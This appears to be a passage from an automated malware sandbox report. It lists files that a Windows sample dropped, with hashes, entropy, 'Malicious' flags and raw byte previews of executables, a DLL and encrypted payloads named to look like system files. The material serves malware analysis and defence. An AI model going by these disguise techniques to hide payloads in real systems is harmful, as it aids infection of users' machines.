                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\f[1].dat

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):879
                                                                            Entropy (8bit):4.5851931774575325
                                                                            Encrypted:false
                                                                            SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                            MD5:E54C4296F011EC91D935AA353C936E34
                                                                            SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                            SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                            SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                            Malicious:false
                                                                            Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FOM-50[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):55085
                                                                            Entropy (8bit):7.99273647746538
                                                                            Encrypted:true
                                                                            SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                            MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                            SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                            SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                            SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FOM-53[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):366410
                                                                            Entropy (8bit):7.375315637594966
                                                                            Encrypted:false
                                                                            SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                            MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                            SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                            SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                            SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].gif

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):3892010
                                                                            Entropy (8bit):7.995495589600101
                                                                            Encrypted:true
                                                                            SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                                            MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                                            SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                                            SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                                            SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dsb-hr1[1].png

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):486896
                                                                            Entropy (8bit):7.999649437186317
                                                                            Encrypted:true
                                                                            SSDEEP:6144:oZ24zuaSbNyXS4pHuYgWOxuYPsE5qvujWt+wnlnRwF0RRbVYZ19dIH0zSUJs/AeC:h4zeauYgLPsZLJnRS+VYZ1Hg0zShxqZ
                                                                            MD5:8FB4D4B3DCE57A2C6F9FF2278B5BAE86
                                                                            SHA1:923840620D9A2464CA4BA9F6C3AC871370832797
                                                                            SHA-256:2DDE9D8EE2A40F5492C68BADCEF8D478C781A9502DB603F0F714310F29C3339F
                                                                            SHA-512:4DD30870F03B77CFA6F3DF360AB7EDAE8A98E996394BB39F771B7860228853F40885BF926EB585986B7639EA3D400A6B6A0F92986D756F9F8751A421638443CC
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7.BJ..@.s..)......K..Nc..j..!.\.:.!.E...N....&.>..Mn*p...8u...XR.L9..ue..txfA$...{4..Fv.j........n.;.."_.,.Fy..1...........pwW...h...o.5C.SY... .u.8..`.N.=8.$.....m..+t..G.D.....9..?.S.+.A4.1z.....m.@N..;.Q{E*..{.z..t.\ti/:..C4..9.9....b.......Z.v1%L..W.pi...S.......+....$.j.F.(.y..U&a.O...."$8 T{....[T2..v'H....|.^$m.P..GhS..v.m....._7...q..g..._..G....BV.[..........T..."]...Y...\..)4..G.R%..r...SU.o.Dj:.AS.x{.Z.t_....(..d..#1#`D.....'.&...(.-,T5..J.....b.4....,....o|."cE.-v7.Jt......A.@V..ma....S.\.-..wJ.....j..L.!..G.\X]T.(....2.2.....<.13..!...F .f..f.D.....7....k<.d&..JM..[.s..o.8^.[...Kq.E..gu.Q=....."1.......H.G.......V&.Q.\..]..,.v..$m{_...QZ....2 .c4$..........E0]....7B.8.E......S..4..:poz4.oWW..-..t..}. .!. .....k.^V+;....V..3Q..V.....C..Y..D/...-h.?B.N;..Zp).....W.....x........j.j.e...?u$.[.I%#.....q..N.....=SNV.Vp.p...#....u7...B...^,......_....3.4..R.#A9.K.fci3*e.%

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dsb-hr2[1].png

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):57536
                                                                            Entropy (8bit):7.99718672166578
                                                                            Encrypted:true
                                                                            SSDEEP:1536:tl/C97eWbmtpgNMVCmVlR2cPfX3Xwn7MQ68eUYriiz:fC9opgNazRDwgwiz
                                                                            MD5:9E285C23C9DA187B313051DD6FEB4266
                                                                            SHA1:71E3F791A947F0DCA9F304B94825ED591CE169BD
                                                                            SHA-256:E47E61463C164964EF47EE707C93DCBCA17861038D8BA7ABCCC853926BEA2FA7
                                                                            SHA-512:DBABCADF0E06196EF3CC473E2D31D6298F5F76C83C3B68E6139B77E0FDF64F547F573861C594FC7FD8D24CAF69DD39ED50AC1D5860F7520A5B0B4EF7EAC3FB4C
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7...N..A....m...}...N..j..!.r..}j..[...M.a../.....2.GI\(;[K.9b..'...1.G.P...'=d.;3.Q.Qx88pz.&.:...;.D...Y.M`......&.*.....z....YR..<4.'.2J.U..z.q.....!.....2.j.......;..M0..8d.9i...&N...?*.2..Lr.h..h.B........>.0.Xt.uL..0....nVrJ.4.3.H................k..x....-..J\..".tw...o:F.h...p.Z...C..+e...........o@/g.kZ......oq.....U..*..{.A.`*....).....V.r._.QcZ....oq}DlSfcO......9f........`.7....k.XyU..........`......A...&....I......&..1..~_...,qj...<...I19.r........<`P.{.........'.......X.].r..pQp../.C....V.~X..4...8.b...s@\..,...|./f...D\.{......z......<..z..a....~.........._.}..~..-...K.n%~..y..|.X..^.!;. ..(.....i..s....q..F?.h.f.&n.IGQ.>h.[u.yA....e.p.R.yi}.@0.z...f.m...l!-7k..."b.m.U.+.X,...a<.1...$.....3{7X..roJ0X.J..&}.>......np..(..W.]/.vY..QS..&j..j.r.l......<.**...V....un..c5..5k..P\Ug.s...Y....cJ.L.\Sg=S...$..Q.I#...G..g.I...}.g+_T...T..B..a....0.7....>.F.,..{...r.L.

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dsb-hr3[1].png

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):357504
                                                                            Entropy (8bit):7.999473897820039
                                                                            Encrypted:true
                                                                            SSDEEP:6144:PWBjlu8Tzg5uKKa+87hJG8Z2P6XhnRlKEOMUvykizQz+D:OplusDv4LG8BXRfsRid
                                                                            MD5:2977911419E268860C5E85E967E5C13E
                                                                            SHA1:4D9EE17F22C8B4207271E872C3B25910D9773A15
                                                                            SHA-256:405EEAB6A864C0DE19E5B929E7CBB235F7D734ACDD4330B4AE65B88AC238DAE9
                                                                            SHA-512:5BE7FC74FD795C63F8C3323E46961C1B0F2D9F4084CE417BE6D68153D93CA5CE90459EE8C83B3CEAEB4DE757A657DEAAC5979D0BBE01681368263B2CAA61F328
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7!.....Z.w..$.....D..Nlv.i..j..4.:.!..H@.>3...D.w..0.L...W..F..y...hr>.W.q.j.yX....N...Ny.l.s...~..&3.P...f.4?.&.#P...<..y"..x...f.b.JS.....I?...s.}TE2.A.q..O*kI..P.M.h...A=..V9.....A.R3J\BVA.'..4.x.).M.o.g...px.Mw.#.2.../EF.....b..)cj.X..s......8.m.....*..T*.2.O.h.JO<...>.q.qi..$u...=w.dr.g.F.@..P....Fs.u...v..'.D.C..H.;]...-.8..wC....).-..%.?$.da...&.....+(...1..q.2..;..0...u...0....]...k..S....=B.e*..3.xt....8......Z...uO($k..P.d.F?;v...?0=..*.".......@...o.mo.....<B.K.4....N.....2./&.......}.. ..h...../X7....;VP.G.Q.....6.%v...m.....M.cQ...x.H-.L.?z....W.|!....Ex.....r...7...;..5?....'.....G....-[.u...f...w(.E=....5L.y.Q.>.})....~l.^.7...F(F.0..<}...4..s....L.=..8.G.Q...._g...~.......oy..d.V.....M....>%.N[.U..x..f`U|.kD.dM.!..%.y.gO....9.......<+\.wI...pfz.l.)9...R..R...........Df.._..l...g/Z....54.n.3.d.41V.ue......S..d..K.P_...c..x..FY.vP.z...M.....,.....:..@l...I..

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\extra-task2[1].png

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1589824
                                                                            Entropy (8bit):7.999900949539504
                                                                            Encrypted:true
                                                                            SSDEEP:49152:ejDii8G+quo3pXoJXUK1q3EUNDi8oNH43m:e3PrVOf1q3tRq43m
                                                                            MD5:BA024D16008C2932005DB859C94476A8
                                                                            SHA1:9C832735CD7439BB82449EBCB41E240EFD51EA1E
                                                                            SHA-256:753920EE4FC22EBA98ACA6A6BF0C75BAC2E5145DE4316EBA4B78ABDA74A2C2D2
                                                                            SHA-512:9944E398921C71BC6FEC4BB957EABC1D0EAE40BDDB4BB6CE21D08EF60755F143D7B53248D3EB7C8D9B85214A152A42420ED153F4163A937DDB4EEF37A46D3B1B
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7.BJ..@.s..)......K..Nc..j..!.\.:.!.E...N....&.>..Mn*p...t...XR.L9..ue..txfA$...{4..Fv.j........n.;.."_.,.Fy..1...........Jj...!|..J.F..R9.L.Qy..KK.Z...xy..m.*d.)&%....q...G..YR.#g.......B.....r..k...2K.....%d16&..4Qg\...S4..9.9....b.......ZEF/%x..W.=.=...S....V..*....$vl.F......Eyr.O....R78 T;....[T0..v'H....Z..$m.P[.GhC..5.k.5..._'...q..g..._..G....l"h#........X.T...."=v..Y...\..)d....RE-r..b..S.wo.D*;.AS.x{.Z.t_....(..d..c1# j.{r.'.*...(y,,T5..J.....b.4....,....SAM.ycE.-.m.zt......A.PV..ma....S.\.....dV.B%.j...P...I..^]T.$..?..2.2.....|.1.B...F..#....J..>..7.....<.d...JM..{.sk...Tq.[...Kq.c..eu.Q}..."1.....U.H..G.......V&.Q.\..]..,.v..$m{_...QZ....2 .c4$..........E0]....7B.8.E......S..4..:poz4.oWW..-..t..}. .!. .....k.^V+;....V..3Q..V.....C..Y..D/...-h.?B.N;..Zp).....W.....x........j.j.e...?u$.[.I%#.....q..N.....=SNV.Vp.p...#....u7...B...^,......_....3.4..R.#A9.K.fci3*e.%

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\f[1].dat

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):879
                                                                            Entropy (8bit):4.5851931774575325
                                                                            Encrypted:false
                                                                            SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                            MD5:E54C4296F011EC91D935AA353C936E34
                                                                            SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                            SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                            SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                            Malicious:false
                                                                            Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\i[1].dat

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):5.341611275787448
                                                                            Encrypted:false
                                                                            SSDEEP:6:WyaTcR/nqq3uCrCa2BIDR2ln6d+HXV8jmF2X7OdUzW9E40/qcX:RYcRyqpMBIDR2llCLgUzWg3
                                                                            MD5:5BC7F760FAAAF88924A99A88F3882597
                                                                            SHA1:A5D081DEBFF831407F74AFA7E68C498DB044B898
                                                                            SHA-256:CDA64185F728BEE0E2DD8010966F4BEBEE84134A925762CAF79EB394D9A691D7
                                                                            SHA-512:748E24826413A5F350148E92DE54406C7B529B0BF538F61260310B217272C174282E92EC054D16EF5AFD9DEBE9ECC34399EA044639E3C4769B237D6A86286212
                                                                            Malicious:false
                                                                            Preview:....l%00DZW_77q0CC.S=~16_\_X?v94]MAZ9)t9VT.Xv?1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>VJJN=taa....ff a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33GYT\44r3@@.P>}25\_\[<u:7^NBY:*w:UW.Yw>0?????????????????????????????????WKKO<u``....gg!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll

                                                                            C:\Users\user\Documents\9afrYB.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):133136
                                                                            Entropy (8bit):6.350273548571922
                                                                            Encrypted:false
                                                                            SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                            MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                            SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                            SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                            SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\Documents\MsMpList.dat

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):3889557
                                                                            Entropy (8bit):7.999938759056486
                                                                            Encrypted:true
                                                                            SSDEEP:98304:0AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:vndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                            MD5:114C58BC10549F3024EAA34CBF82424E
                                                                            SHA1:934275A42997D0BE81A6B586D248069D091FD539
                                                                            SHA-256:DADEAC4651C6E80BF1C84A0FC3A9A9B996940EF180690F8F9B308D00DBC74491
                                                                            SHA-512:45D75B3C4E8B0AEB14F2F016F711DB84FBE0D3CBCD3C7A8412A97675EFAB48FEA5CB71805BBD0180906B37ABB8EB4D75F268269D4A75674717238D5422C222FB
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q{.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Users\user\Documents\WordpadFilter.db

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:GIF image data, version 89a, 10 x 10
                                                                            Category:dropped
                                                                            Size (bytes):8228
                                                                            Entropy (8bit):7.978936157803006
                                                                            Encrypted:false
                                                                            SSDEEP:192:cBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:cBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                            MD5:EF083BD328B7AB45AECADF1858BA655A
                                                                            SHA1:4B6783D3CD3FEAE11C38F462C7B20CD9A2018A9D
                                                                            SHA-256:89CCE2BD4ADF9F34791944D34AE1BAB2126233AAEC0F8F59CC2D8A8DE03912AB
                                                                            SHA-512:CAEF139958BB79CC7F958CA7D14F675336D8A060B672FFDAA2B95539E3E423D96F1D092D3575DF87A7C3E329F081ECF324F8D349622ECC60A058E99016E12105
                                                                            Malicious:false
                                                                            Preview:GIF89a.......,.s.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                                                            C:\Users\user\Documents\vselog.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\2873466535874-68348745.02.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):122880
                                                                            Entropy (8bit):6.002072888832372
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FU:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gU
                                                                            MD5:AC1EB094680F2939492334715646840D
                                                                            SHA1:E9BD1910BA70727749A1779BB5949076C047D6A6
                                                                            SHA-256:8CD9666BB51E8DA28B9EE27D26595C4DF77F63A40030FFE2F1800BC2EDBB1F5E
                                                                            SHA-512:6C02C888C77AC384B7CA701AC35F27BA62C0ADD17D5A7271A629E00A8F66970E9607D8E16F5F9CEA837DFF2237801829C8DA0D44B96819EFB6B158CF36E1CE5D
